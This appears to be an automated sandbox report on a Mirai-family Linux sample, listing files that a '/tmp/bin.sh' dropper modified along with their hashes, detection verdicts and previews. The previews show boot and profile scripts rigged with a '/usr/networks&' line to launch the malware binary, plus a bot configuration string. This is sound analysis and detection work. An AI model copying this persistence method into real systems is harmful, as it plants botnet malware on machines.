                                                                                                    SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/checkroot-bootclean.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):250
                                                                                                    Entropy (8bit):4.872318043360431
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                    MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                    SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                    SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                    SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/checkroot.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3111
                                                                                                    Entropy (8bit):4.922960717312443
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                    MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                    SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                    SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                    SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                    /etc/init.d/hostname.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):404
                                                                                                    Entropy (8bit):5.01878905639229
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                    MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                    SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                    SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                    SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/hwclock.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountall-bootclean.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):249
                                                                                                    Entropy (8bit):4.8912088003487595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                    MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                    SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                    SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                    SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountall.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148
                                                                                                    Entropy (8bit):4.74526082342869
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                    MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                    SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                    SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                    SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountdevsubfs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56
                                                                                                    Entropy (8bit):4.1427249051134325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                    MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                    SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                    SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                    SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountkernfs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56
                                                                                                    Entropy (8bit):4.1427249051134325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                    MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                    SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                    SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                    SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountnfs-bootclean.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):249
                                                                                                    Entropy (8bit):4.8916208864241355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                    MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                    SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                    SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                    SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/mountnfs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):190
                                                                                                    Entropy (8bit):3.788938232230384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                    MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                    SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                    SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                    SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/umountnfs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):145
                                                                                                    Entropy (8bit):4.730534942677594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                    MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                    SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                    SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                    SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/profile.d/Z97-byobu.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/profile.d/apps-bin-path.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/profile.d/bash_completion.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/profile.d/cedilla-portuguese.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/profile.d/vte-2.91.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/rc.local
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOOR3n:M
                                                                                                    MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                    SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                    SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                    SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&.exit 0.
                                                                                                    /etc/rcS.d/S95baby.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):3.8936606896881854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TKH4v0VJ:hK
                                                                                                    MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                    SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                    SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                    SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                    Malicious:true
                                                                                                    Preview: #!/bin/sh./usr/networks&.
                                                                                                    /etc/wpa_supplicant/action_wpa.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):714
                                                                                                    Entropy (8bit):5.329653855555143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                    MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                    SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                    SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                    SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                    /etc/wpa_supplicant/functions.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/wpa_supplicant/ifupdown.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3368
                                                                                                    Entropy (8bit):5.3288648372922625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                    MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                    SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                    SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                    SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                    /tmp/.config
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):173
                                                                                                    Entropy (8bit):4.908121595120361
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:x/HKRb+NWzBMSKtbUNNQSf9xO4NRzfqiQKaHunjbzAWCTTnQMN+d/L+Xqg3KN0:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+M
                                                                                                    MD5:1021E0B7B7DE44145038C705865F9FF2
                                                                                                    SHA1:5E7EC0275CA63E162238FE7A6AD7FD7485372427
                                                                                                    SHA-256:9FF9646A48EE08E9A11D2653EDA13902B68BF4B429996184C21B1E67980D2980
                                                                                                    SHA-512:841436B650B083FD4CFF76CBCDFE471F79A0F9EC26F43537BBBA1136769884338A9DC869AF81EEE289CCB6101375945877BA3E71F994E9925D99B1793CB6FD5B
                                                                                                    Malicious:false
                                                                                                    Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]
                                                                                                    /usr/bin/gettext.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1914
                                                                                                    Entropy (8bit):4.829445473341419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                    MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                    SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                    SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                    SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                    /usr/networks
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                    Category:dropped
                                                                                                    Size (bytes):307960
                                                                                                    Entropy (8bit):5.819679405566689
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                    MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                    SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                    SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                    SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                    • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                                                                    Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                    /usr/sbin/alsa-info.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text, with very long lines
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25983
                                                                                                    Entropy (8bit):5.455683610707543
                                                                                                    Encrypted:false
